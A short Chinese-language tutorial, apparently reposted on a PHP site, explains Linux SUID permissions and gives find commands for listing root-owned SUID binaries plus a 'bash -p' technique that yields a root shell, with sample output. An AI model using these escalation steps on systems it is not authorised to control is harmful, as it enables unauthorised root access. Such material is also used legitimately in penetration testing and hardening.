首頁  >  文章  >  運維  >  Linux下如何利用SUID提權

Linux下如何利用SUID提權

WBOY
WBOY轉載
2023-05-23 23:52:051749瀏覽

SUID是Linux的一種權限機制,具有這種權限的檔案會在執行時,使呼叫者暫時取得該檔案擁有者的權限。如果擁有SUID權限,那麼就可以利用系統中的二進位檔案和工具來進行root提權。

以下命令可以發現系統上執行的所有SUID可執行檔。具體來說,指令將嘗試尋找具有root權限的SUID的檔案。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls

Linux下如何利用SUID提權

 

Linux下如何利用SUID提權

# 以上所有二進位檔案都會以root使用者權限執行,因為它們的權限中包含"s",且對應的是root權限。

Bash

以下指令將以root權限開啟一個bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

Linux下如何利用SUID提權

#

以上是Linux下如何利用SUID提權的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述:
本文轉載於:yisu.com。如有侵權,請聯絡admin@php.cn刪除